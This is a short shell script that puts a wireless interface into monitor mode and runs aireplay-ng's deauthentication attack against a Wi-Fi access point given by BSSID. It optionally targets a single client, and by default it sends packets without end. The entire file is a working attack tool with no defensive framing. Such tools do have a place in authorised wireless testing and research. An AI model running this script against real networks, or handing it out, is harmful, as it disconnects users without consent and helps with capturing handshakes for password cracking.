#!/bin/dash

wlan mon

BSSID="$1"
PACKETS="$2"
CLIENT="$3"
IFACE="$(wlanDevice mon)"

while [ -z "$BSSID" ]; do read -r -p 'BSSID: ' BSSID ; done
[ -z "$PACKETS" ] && PACKETS="0"

if [ -z "$CLIENT" ]; then
	sudo aireplay-ng -a "$BSSID" -0 "$PACKETS" "$IFACE"
else
	sudo aireplay-ng -a "$BSSID" -0 "$PACKETS" -c "$CLIENT" "$IFACE"
fi
